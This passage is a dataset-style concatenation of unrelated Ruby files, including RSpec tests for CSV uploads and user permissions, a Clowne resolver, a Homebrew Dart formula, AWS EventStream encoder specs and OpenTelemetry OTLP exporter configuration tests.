"shl_case_numbers" => {"SF16-9A"=>50, "SF16-9B"=>50, "SF16-9C"=>50, "SF16-9D"=>50, "SF16-9E"=>50}
}
)
expect(page).to have_content expected_success_message
end
end
context 'when user uploads a CSV with invalid headers' do
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", invalid_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Failed"
expect(processed_file.job_errors).to eq "Does not have valid header(s). Data not imported!"
expect(processed_file.job_stats).to eq({})
expect(page).to have_content expected_success_message
end
end
context 'when user upload a CSV that has been already processed' do
before do
FactoryBot.create :processed_file,
filename: 'Untagged_assessment_03122018.csv',
category: 'Untagged Animal Assessment',
status: 'Processed',
temporary_file_id: temporary_file.id
end
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", valid_file)
processed_file = ProcessedFile.where(status: "Failed").first
expect(ProcessedFile.count).to eq 2
expect(processed_file.job_errors).to eq "Already processed a file on #{processed_file.created_at.strftime('%m/%d/%Y')} with the same name: Untagged_assessment_03122018.csv. Data not imported!"
expect(processed_file.job_stats).to eq({})
expect(page).to have_content expected_success_message
end
end
context 'when user upload file with invalid rows' do
it "creates new ProcessedFile record with 'Failed' status" do
upload_file("Untagged Animal Assessment", incomplete_data_file)
processed_file = ProcessedFile.last
expect(ProcessedFile.count).to eq 1
expect(processed_file.status).to eq "Failed"
expect(processed_file.job_errors).to eq("Does not have valid row(s). Data not imported!")
expect(processed_file.job_stats).to eq({"row_number_2"=>{"cohort"=>[{"error"=>"blank"}]}, "row_number_3"=>{"growout_rack"=>[{"error"=>"blank"}]}})
expect(page).to have_content expected_success_message
end
end
end
| 43.345679 | 198 | 0.698946 |
1a9f6aefa3b12a635270b0649415bafdcf7c87ad | 1,074 | # frozen_string_literal: true
module Clowne
module Adapters # :nodoc: all
class ActiveRecord
module Resolvers
class UnknownAssociation < StandardError; end
class Association
class << self
# rubocop: disable Metrics/ParameterLists
def call(source, record, declaration, adapter:, params:, **_options)
reflection = source.class.reflections[declaration.name.to_s]
if reflection.nil?
raise UnknownAssociation,
"Association #{declaration.name} couldn't be found for #{source.class}"
end
cloner_class = Associations.cloner_for(reflection)
cloner_class.new(reflection, source, declaration, adapter, params).call(record)
record
end
# rubocop: enable Metrics/ParameterLists
end
end
end
end
end
end
Clowne::Adapters::ActiveRecord.register_resolver(
:association,
Clowne::Adapters::ActiveRecord::Resolvers::Association,
before: :nullify
)
| 27.538462 | 93 | 0.623836 |
629b21c786819d750fae641df1fa0da6b73ab1e3 | 275 | class Category < ApplicationRecord
resourcify
acts_as_tree counter_cache: :children_count
extend FriendlyId
friendly_id :name, use: :slugged, routes: :default
has_and_belongs_to_many :sections, join_table: :section_categories
def to_s
self.name
end
end
| 18.333333 | 68 | 0.774545 |
bbfe01df29e3ff0e22b8ab999c408333037657a2 | 1,855 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataShare::Mgmt::V2018_11_01_preview
module Models
#
# log specifications for operation api
#
class OperationMetaLogSpecification
include MsRestAzure
# @return [String] blob duration of the log
attr_accessor :blob_duration
# @return [String] localized name of the log category
attr_accessor :display_name
# @return [String] name of the log category
attr_accessor :name
#
# Mapper for OperationMetaLogSpecification class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'OperationMetaLogSpecification',
type: {
name: 'Composite',
class_name: 'OperationMetaLogSpecification',
model_properties: {
blob_duration: {
client_side_validation: true,
required: false,
serialized_name: 'blobDuration',
type: {
name: 'String'
}
},
display_name: {
client_side_validation: true,
required: false,
serialized_name: 'displayName',
type: {
name: 'String'
}
},
name: {
client_side_validation: true,
required: false,
serialized_name: 'name',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.884058 | 70 | 0.525606 |
2141cb7274f487f15ee9331a4a78da42aaa914ae | 36 | module Abra
VERSION = "1.0.2"
end
| 9 | 19 | 0.638889 |
7ae2bae5e10b9b515d7d602f80ed6864d00348f6 | 963 | require 'formula'
class Dart < Formula
homepage 'https://www.dartlang.org/'
if MacOS.prefer_64_bit?
url 'https://storage.googleapis.com/dart-archive/channels/stable/release/38663/sdk/dartsdk-macos-x64-release.zip'
sha1 'fc214070863861e444b0a9619dd92a93c0932bc9'
else
url 'https://storage.googleapis.com/dart-archive/channels/stable/release/38663/sdk/dartsdk-macos-ia32-release.zip'
sha1 'd6d2ba9950f3625d15c39814c183364dcd46b945'
end
version '1.5.8'
def install
libexec.install Dir['*']
bin.install_symlink "#{libexec}/bin/dart"
bin.write_exec_script Dir["#{libexec}/bin/{pub,dart?*}"]
end
def caveats; <<-EOS.undent
To use with IntelliJ, set the Dart home to:
#{opt_libexec}
EOS
end
test do
(testpath/'sample.dart').write <<-EOS.undent
void main() {
print(r"test message");
}
EOS
assert_equal "test message\n", shell_output("#{bin}/dart sample.dart")
end
end
| 25.342105 | 118 | 0.69055 |
798538a3445d2d430353f28bf4633936fab0168f | 1,704 | require 'fileutils'
require 'tempfile'
require_relative 'spec_helper'
module Aws
module EventStream
describe Encoder do
describe "#encode" do
Dir.glob(File.expand_path('../fixtures/decoded/positive/*', __FILE__)).each do |path|
suit_name = File.basename(path)
expect_path = File.join(File.expand_path('../fixtures/encoded/positive', __FILE__), suit_name)
msg_raw = SpecHelper.convert_msg(path) # msg to be encoded
it "encode suit: #{suit_name} correctly" do
file = Tempfile.new('foo')
Encoder.new.encode(msg_raw, file)
expect(FileUtils.compare_file(file.path, expect_path)).to be(true)
file.unlink
end
end
end
describe "#encode error" do
it 'raises an error when payload exceeds' do
payload = double('payload', :length => 16777217)
message = Aws::EventStream::Message.new(
headers: {},
payload: payload
)
expect {
Encoder.new.encode(message)
}.to raise_error(Aws::EventStream::Errors::EventPayloadLengthExceedError)
end
it 'raises an error when encoded headers exceeds' do
headers = {}
headers['foo'] = Aws::EventStream::HeaderValue.new(
value: "*" * 131073, type: 'string'
)
message = Aws::EventStream::Message.new(
headers: headers,
payload: StringIO.new
)
expect {
Encoder.new.encode(message)
}.to raise_error(Aws::EventStream::Errors::EventHeadersLengthExceedError)
end
end
end
end
end
| 27.047619 | 104 | 0.579812 |
ac0ea7b67e52ffd91e2bcf83cb931b6ff7282f64 | 1,760 | require "application_system_test_case"
class CommandActionsTest < ApplicationSystemTestCase
setup do
@command_action = command_actions(:one)
end
test "visiting the index" do
visit command_actions_url
assert_selector "h1", text: "Command Actions"
end
test "creating a Command action" do
visit command_actions_url
click_on "New Command Action"
fill_in "Act", with: @command_action.act
fill_in "Card", with: @command_action.card_id
fill_in "E No", with: @command_action.e_no
fill_in "Generate No", with: @command_action.generate_no
fill_in "Gowait", with: @command_action.gowait
fill_in "Result No", with: @command_action.result_no
fill_in "S No", with: @command_action.s_no
fill_in "Timing", with: @command_action.timing
click_on "Create Command action"
assert_text "Command action was successfully created"
click_on "Back"
end
test "updating a Command action" do
visit command_actions_url
click_on "Edit", match: :first
fill_in "Act", with: @command_action.act
fill_in "Card", with: @command_action.card_id
fill_in "E No", with: @command_action.e_no
fill_in "Generate No", with: @command_action.generate_no
fill_in "Gowait", with: @command_action.gowait
fill_in "Result No", with: @command_action.result_no
fill_in "S No", with: @command_action.s_no
fill_in "Timing", with: @command_action.timing
click_on "Update Command action"
assert_text "Command action was successfully updated"
click_on "Back"
end
test "destroying a Command action" do
visit command_actions_url
page.accept_confirm do
click_on "Destroy", match: :first
end
assert_text "Command action was successfully destroyed"
end
end
| 30.344828 | 60 | 0.725568 |
ab1d3f079b49b4c6563c809d3258292e80481569 | 2,205 | module OpenConferenceWare
module ProposalsHelper
# Return link with a +label+ for sorting records by +field+. The optional
# +kind+ (e.g., :sessions or :proposals) determines what URLs to generate, if
# one isn't specified, then the @kind instance variable will be used.
def sort_link_for(label, field, kind=nil)
kind ||= @kind
opts = {sort: field}
opts[:dir] = 'desc' if ( field == params[:sort] && params[:dir] != 'desc' )
link = link_to(label, self.send("event_#{kind}_path", @event, opts))
link += ( params[:dir] == 'desc' ? ' ∨' : ' ∧' ).html_safe if field == params[:sort]
return link
end
# Return a link path for the given +object+. The optional +kind+ (e.g.,
# :sessions or :proposals) determines what kind of links to make, if one
# isn't specified, then the @kind instance variable will be used.
def record_path(object, kind=nil)
kind ||= @kind
raise ArgumentError, "No kind or @kind specified" unless kind
kind = kind.to_s.singularize
return self.send("#{kind}_path", object)
end
# Return a link path for the collection. The optional +kind+ (e.g.,
# :sessions or :proposals) determines what kind of links to make, if one
# isn't specified, then the @kind instance variable will be used.
def records_path(kind=nil)
kind = (kind || @kind).to_s.pluralize
return self.send("event_#{kind}_path", @event)
end
# Return a path to the next proposal after +proposal+. Or none if none.
def next_proposal_path_from(proposal)
if selector?
next_proposal = proposal.next_random_proposal(current_user.id, current_user.id)
else
next_proposal = proposal.next_proposal
end
next_proposal ? proposal_path(next_proposal) : nil
end
# Return a path to the previous proposal after +proposal+. Or none if none.
def previous_proposal_path_from(proposal)
if selector?
previous_proposal = proposal.previous_random_proposal(current_user.id)
else
previous_proposal = proposal.previous_proposal
end
previous_proposal ? proposal_path(previous_proposal) : nil
end
end
end
| 37.372881 | 97 | 0.666667 |
910ed16320817989153e7fa234d08182129f1b43 | 1,774 | RSpec.describe WorldpayCnp::XML do
describe ".parse" do
it "parses XML (string) to a hash" do
hash = described_class.parse(fixture_file("sale_sample.xml").read)
expect(hash).to eq(
'cnpOnlineRequest' => {
'version' => '12.8',
'merchantId' => '1',
'authentication' => {
'user' => 'username',
'password' => 'password'
},
'sale' => {
'id' => "test-123",
'reportGroup' => 'Default Report Group',
'orderId' => "test-456",
'amount' => '1000',
'orderSource' => 'ecommerce',
'card' => {
'type' => 'VI',
'number' =>'4457010000000009',
'expDate' =>'1025',
'cardValidationNum' => '349',
}
}
}
)
end
end
describe ".serialize" do
it "serializes a hash into XML (string)" do
hash = {
'cnpOnlineRequest' => {
'@xmlns': 'http://www.vantivcnp.com/schema',
'@version' => '12.8',
'@merchantId' => '1',
'authentication' => {
'user' => 'username',
'password' => 'password'
},
'sale' => {
'@id' => "test-123",
'@reportGroup' => 'Default Report Group',
'orderId' => "test-456",
'amount' => '1000',
'orderSource' => 'ecommerce',
'card' => {
'type' => 'VI',
'number' => '4457010000000009',
'expDate' => '1025',
'cardValidationNum' => '349',
}
}
}
}
expect(described_class.serialize(hash)).to eq fixture_file("sale_sample.xml").read
end
end
end
| 27.292308 | 88 | 0.429538 |
7a3ab65e0aef98e0dbea036c9ca260ff605cf50e | 5,614 | require "testing_env"
require "formula"
require "formula_installer"
require "utils/bottles"
class FormularyTest < Homebrew::TestCase
def test_class_naming
assert_equal "ShellFm", Formulary.class_s("shell.fm")
assert_equal "Fooxx", Formulary.class_s("foo++")
assert_equal "SLang", Formulary.class_s("s-lang")
assert_equal "PkgConfig", Formulary.class_s("pkg-config")
assert_equal "FooBar", Formulary.class_s("foo_bar")
end
end
class FormularyFactoryTest < Homebrew::TestCase
def setup
@name = "testball_bottle"
@path = CoreTap.new.formula_dir/"#{@name}.rb"
@bottle_dir = Pathname.new("#{File.expand_path("..", __FILE__)}/bottles")
@bottle = @bottle_dir/"testball_bottle-0.1.#{Utils::Bottles.tag}.bottle.tar.gz"
@path.write <<-EOS.undent
class #{Formulary.class_s(@name)} < Formula
url "file://#{File.expand_path("..", __FILE__)}/tarballs/testball-0.1.tbz"
sha256 TESTBALL_SHA256
bottle do
cellar :any_skip_relocation
root_url "file://#{@bottle_dir}"
sha256 "9abc8ce779067e26556002c4ca6b9427b9874d25f0cafa7028e05b5c5c410cb4" => :#{Utils::Bottles.tag}
end
def install
prefix.install "bin"
prefix.install "libexec"
end
end
EOS
end
def teardown
@path.unlink
end
def test_factory
assert_kind_of Formula, Formulary.factory(@name)
end
def test_factory_with_fully_qualified_name
assert_kind_of Formula, Formulary.factory("homebrew/core/#{@name}")
end
def test_formula_unavailable_error
assert_raises(FormulaUnavailableError) { Formulary.factory("not_existed_formula") }
end
def test_formula_class_unavailable_error
name = "giraffe"
path = CoreTap.new.formula_dir/"#{name}.rb"
path.write "class Wrong#{Formulary.class_s(name)} < Formula\nend\n"
assert_raises(FormulaClassUnavailableError) { Formulary.factory(name) }
ensure
path.unlink
end
def test_factory_from_path
assert_kind_of Formula, Formulary.factory(@path)
end
def test_factory_from_url
formula = shutup { Formulary.factory("file://#{@path}") }
assert_kind_of Formula, formula
ensure
formula.path.unlink
end
def test_factory_from_bottle
formula = Formulary.factory(@bottle)
assert_kind_of Formula, formula
assert_equal @bottle.realpath, formula.local_bottle_path
end
def test_factory_from_alias
alias_dir = CoreTap.instance.alias_dir
alias_dir.mkpath
FileUtils.ln_s @path, alias_dir/"foo"
assert_kind_of Formula, Formulary.factory("foo")
ensure
alias_dir.rmtree
end
def test_factory_from_rack_and_from_keg
formula = Formulary.factory(@path)
installer = FormulaInstaller.new(formula)
shutup { installer.install }
keg = Keg.new(formula.prefix)
f = Formulary.from_rack(formula.rack)
assert_kind_of Formula, f
assert_kind_of Tab, f.build
f = Formulary.from_keg(keg)
assert_kind_of Formula, f
assert_kind_of Tab, f.build
ensure
keg.unlink
keg.uninstall
formula.clear_cache
formula.bottle.clear_cache
end
def test_load_from_contents
assert_kind_of Formula, Formulary.from_contents(@name, @path, @path.read)
end
def test_to_rack
assert_equal HOMEBREW_CELLAR/@name, Formulary.to_rack(@name)
(HOMEBREW_CELLAR/@name).mkpath
assert_equal HOMEBREW_CELLAR/@name, Formulary.to_rack(@name)
assert_raises(TapFormulaUnavailableError) { Formulary.to_rack("a/b/#{@name}") }
ensure
FileUtils.rm_rf HOMEBREW_CELLAR/@name
end
end
class FormularyTapFactoryTest < Homebrew::TestCase
def setup
@name = "foo"
@tap = Tap.new "homebrew", "foo"
@path = @tap.path/"#{@name}.rb"
@code = <<-EOS.undent
class #{Formulary.class_s(@name)} < Formula
url "foo-1.0"
end
EOS
@path.write @code
end
def teardown
@tap.path.rmtree
end
def test_factory_tap_formula
assert_kind_of Formula, Formulary.factory(@name)
end
def test_factory_tap_alias
alias_dir = @tap.path/"Aliases"
alias_dir.mkpath
FileUtils.ln_s @path, alias_dir/"bar"
assert_kind_of Formula, Formulary.factory("bar")
end
def test_tap_formula_unavailable_error
assert_raises(TapFormulaUnavailableError) { Formulary.factory("#{@tap}/not_existed_formula") }
end
def test_factory_tap_formula_with_fully_qualified_name
assert_kind_of Formula, Formulary.factory("#{@tap}/#{@name}")
end
def test_factory_ambiguity_tap_formulae
another_tap = Tap.new "homebrew", "bar"
(another_tap.path/"#{@name}.rb").write @code
assert_raises(TapFormulaAmbiguityError) { Formulary.factory(@name) }
ensure
another_tap.path.rmtree
end
end
class FormularyTapPriorityTest < Homebrew::TestCase
def setup
@name = "foo"
@core_path = CoreTap.new.formula_dir/"#{@name}.rb"
@tap = Tap.new "homebrew", "foo"
@tap_path = @tap.path/"#{@name}.rb"
code = <<-EOS.undent
class #{Formulary.class_s(@name)} < Formula
url "foo-1.0"
end
EOS
@core_path.write code
@tap_path.write code
end
def teardown
@core_path.unlink
@tap.path.rmtree
end
def test_find_with_priority_core_formula
formula = Formulary.find_with_priority(@name)
assert_kind_of Formula, formula
assert_equal @core_path, formula.path
end
def test_find_with_priority_tap_formula
@tap.pin
formula = shutup { Formulary.find_with_priority(@name) }
assert_kind_of Formula, formula
assert_equal @tap_path.realpath, formula.path
ensure
@tap.pinned_symlink_path.parent.parent.rmtree
end
end
| 27.385366 | 109 | 0.708942 |
1acb5846fcf9028026ddb5104637bfb58fc791e7 | 3,687 | require 'spec_helper'
describe Ability, lib: true do
describe '.users_that_can_read_project' do
context 'using a public project' do
it 'returns all the users' do
project = create(:project, :public)
user = build(:user)
expect(described_class.users_that_can_read_project([user], project)).
to eq([user])
end
end
context 'using an internal project' do
let(:project) { create(:project, :internal) }
it 'returns users that are administrators' do
user = build(:user, admin: true)
expect(described_class.users_that_can_read_project([user], project)).
to eq([user])
end
it 'returns internal users while skipping external users' do
user1 = build(:user)
user2 = build(:user, external: true)
users = [user1, user2]
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns external users if they are the project owner' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(project).to receive(:owner).twice.and_return(user1)
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns external users if they are project members' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(project.team).to receive(:members).twice.and_return([user1])
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns an empty Array if all users are external users without access' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(described_class.users_that_can_read_project(users, project)).
to eq([])
end
end
context 'using a private project' do
let(:project) { create(:project, :private) }
it 'returns users that are administrators' do
user = build(:user, admin: true)
expect(described_class.users_that_can_read_project([user], project)).
to eq([user])
end
it 'returns external users if they are the project owner' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(project).to receive(:owner).twice.and_return(user1)
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns external users if they are project members' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(project.team).to receive(:members).twice.and_return([user1])
expect(described_class.users_that_can_read_project(users, project)).
to eq([user1])
end
it 'returns an empty Array if all users are internal users without access' do
user1 = build(:user)
user2 = build(:user)
users = [user1, user2]
expect(described_class.users_that_can_read_project(users, project)).
to eq([])
end
it 'returns an empty Array if all users are external users without access' do
user1 = build(:user, external: true)
user2 = build(:user, external: true)
users = [user1, user2]
expect(described_class.users_that_can_read_project(users, project)).
to eq([])
end
end
end
end
| 31.245763 | 83 | 0.628967 |
ac262aec00b69ff8dbc44f2ee2d852ebdcf54e7d | 28,970 | # frozen_string_literal: true
# Copyright The OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0
require 'test_helper'
describe OpenTelemetry::Exporter::OTLP::Exporter do
SUCCESS = OpenTelemetry::SDK::Trace::Export::SUCCESS
FAILURE = OpenTelemetry::SDK::Trace::Export::FAILURE
TIMEOUT = OpenTelemetry::SDK::Trace::Export::TIMEOUT
describe '#initialize' do
it 'initializes with defaults' do
exp = OpenTelemetry::Exporter::OTLP::Exporter.new
_(exp).wont_be_nil
_(exp.instance_variable_get(:@headers)).must_be_empty
_(exp.instance_variable_get(:@timeout)).must_equal 10.0
_(exp.instance_variable_get(:@path)).must_equal '/v1/traces'
_(exp.instance_variable_get(:@compression)).must_be_nil
http = exp.instance_variable_get(:@http)
_(http.ca_file).must_be_nil
_(http.use_ssl?).must_equal true
_(http.address).must_equal 'localhost'
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_PEER
_(http.port).must_equal 4318
end
it 'refuses invalid endpoint' do
assert_raises ArgumentError do
OpenTelemetry::Exporter::OTLP::Exporter.new(endpoint: 'not a url')
end
end
it 'uses endpoints path if provided' do
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(endpoint: 'https://localhost/custom/path')
_(exp.instance_variable_get(:@path)).must_equal '/custom/path'
end
it 'only allows gzip compression or none' do
assert_raises ArgumentError do
OpenTelemetry::Exporter::OTLP::Exporter.new(compression: 'flate')
end
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(compression: 'gzip')
_(exp).wont_be_nil
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(compression: nil)
_(exp).wont_be_nil
end
it 'sets parameters from the environment' do
exp = with_env('OTEL_EXPORTER_OTLP_ENDPOINT' => 'http://localhost:1234',
'OTEL_EXPORTER_OTLP_CERTIFICATE' => '/foo/bar',
'OTEL_EXPORTER_OTLP_HEADERS' => 'a=b,c=d',
'OTEL_EXPORTER_OTLP_COMPRESSION' => 'gzip',
'OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_NONE' => 'true',
'OTEL_EXPORTER_OTLP_TIMEOUT' => '11') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd')
_(exp.instance_variable_get(:@timeout)).must_equal 11.0
_(exp.instance_variable_get(:@path)).must_equal '/v1/traces'
_(exp.instance_variable_get(:@compression)).must_equal 'gzip'
http = exp.instance_variable_get(:@http)
_(http.ca_file).must_equal '/foo/bar'
_(http.use_ssl?).must_equal false
_(http.address).must_equal 'localhost'
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_NONE
_(http.port).must_equal 1234
end
it 'prefers explicit parameters rather than the environment' do
exp = with_env('OTEL_EXPORTER_OTLP_ENDPOINT' => 'https://localhost:1234',
'OTEL_EXPORTER_OTLP_CERTIFICATE' => '/foo/bar',
'OTEL_EXPORTER_OTLP_HEADERS' => 'a:b,c:d',
'OTEL_EXPORTER_OTLP_COMPRESSION' => 'flate',
'OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_PEER' => 'true',
'OTEL_EXPORTER_OTLP_TIMEOUT' => '11') do
OpenTelemetry::Exporter::OTLP::Exporter.new(endpoint: 'http://localhost:4321',
certificate_file: '/baz',
headers: { 'x' => 'y' },
compression: 'gzip',
ssl_verify_mode: OpenSSL::SSL::VERIFY_NONE,
timeout: 12)
end
_(exp.instance_variable_get(:@headers)).must_equal('x' => 'y')
_(exp.instance_variable_get(:@timeout)).must_equal 12.0
_(exp.instance_variable_get(:@path)).must_equal ''
_(exp.instance_variable_get(:@compression)).must_equal 'gzip'
http = exp.instance_variable_get(:@http)
_(http.ca_file).must_equal '/baz'
_(http.use_ssl?).must_equal false
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_NONE
_(http.address).must_equal 'localhost'
_(http.port).must_equal 4321
end
it 'restricts explicit headers to a String or Hash' do
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(headers: { 'token' => 'über' })
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(headers: 'token=%C3%BCber')
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
error = _() {
exp = OpenTelemetry::Exporter::OTLP::Exporter.new(headers: Object.new)
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
describe 'Headers Environment Variable' do
it 'allows any number of the equal sign (=) characters in the value' do
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'a=b,c=d==,e=f') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd==', 'e' => 'f')
exp = with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'a=b,c=d==,e=f') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd==', 'e' => 'f')
end
it 'trims any leading or trailing whitespaces in keys and values' do
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'a = b ,c=d , e=f') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd', 'e' => 'f')
exp = with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'a = b ,c=d , e=f') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('a' => 'b', 'c' => 'd', 'e' => 'f')
end
it 'decodes values as URL encoded UTF-8 strings' do
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'token=%C3%BCber') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => '%C3%BCber=token') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('über' => 'token')
exp = with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'token=%C3%BCber') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
exp = with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => '%C3%BCber=token') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('über' => 'token')
end
it 'prefers TRACES specific variable' do
exp = with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'a=b,c=d==,e=f', 'OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'token=%C3%BCber') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
_(exp.instance_variable_get(:@headers)).must_equal('token' => 'über')
end
it 'fails fast when header values are missing' do
error = _() {
with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'a = ') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
error = _() {
with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'a = ') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
it 'fails fast when header or values are not found' do
error = _() {
with_env('OTEL_EXPORTER_OTLP_HEADERS' => ',') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
error = _() {
with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => ',') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
it 'fails fast when header values contain invalid escape characters' do
error = _() {
with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'c=hi%F3') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
error = _() {
with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'c=hi%F3') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
it 'fails fast when headers are invalid' do
error = _() {
with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'this is not a header') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
error = _() {
with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'this is not a header') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
end
end
describe 'ssl_verify_mode:' do
it 'can be set to VERIFY_NONE by an envvar' do
exp = with_env('OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_NONE' => 'true') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
http = exp.instance_variable_get(:@http)
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_NONE
end
it 'can be set to VERIFY_PEER by an envvar' do
exp = with_env('OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_PEER' => 'true') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
http = exp.instance_variable_get(:@http)
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_PEER
end
it 'VERIFY_PEER will override VERIFY_NONE' do
exp = with_env('OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_NONE' => 'true',
'OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_PEER' => 'true') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
http = exp.instance_variable_get(:@http)
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_PEER
end
end
describe '#export' do
let(:exporter) { OpenTelemetry::Exporter::OTLP::Exporter.new }
before do
OpenTelemetry.tracer_provider = OpenTelemetry::SDK::Trace::TracerProvider.new(resource: OpenTelemetry::SDK::Resources::Resource.telemetry_sdk)
end
it 'integrates with collector' do
skip unless ENV['TRACING_INTEGRATION_TEST']
WebMock.disable_net_connect!(allow: 'localhost')
span_data = create_span_data
exporter = OpenTelemetry::Exporter::OTLP::Exporter.new(endpoint: 'http://localhost:4318', compression: 'gzip')
result = exporter.export([span_data])
_(result).must_equal(SUCCESS)
end
it 'retries on timeout' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_timeout.then.to_return(status: 200)
span_data = create_span_data
result = exporter.export([span_data])
_(result).must_equal(SUCCESS)
end
it 'returns TIMEOUT on timeout' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
span_data = create_span_data
result = exporter.export([span_data], timeout: 0)
_(result).must_equal(TIMEOUT)
end
it 'returns FAILURE on unexpected exceptions' do
log_stream = StringIO.new
logger = OpenTelemetry.logger
OpenTelemetry.logger = ::Logger.new(log_stream)
stub_request(:post, 'https://localhost:4318/v1/traces').to_raise('something unexpected')
span_data = create_span_data
result = exporter.export([span_data], timeout: 1)
_(log_stream.string).must_match(
/ERROR -- : OpenTelemetry error: unexpected error in OTLP::Exporter#send_bytes - something unexpected/
)
_(result).must_equal(FAILURE)
ensure
OpenTelemetry.logger = logger
end
it 'handles encoding failures' do
log_stream = StringIO.new
logger = OpenTelemetry.logger
OpenTelemetry.logger = ::Logger.new(log_stream)
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
span_data = create_span_data
Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.stub(:encode, ->(_) { raise 'a little hell' }) do
_(exporter.export([span_data], timeout: 1)).must_equal(FAILURE)
end
_(log_stream.string).must_match(
/ERROR -- : OpenTelemetry error: unexpected error in OTLP::Exporter#encode - a little hell/
)
ensure
OpenTelemetry.logger = logger
end
it 'returns TIMEOUT on timeout after retrying' do
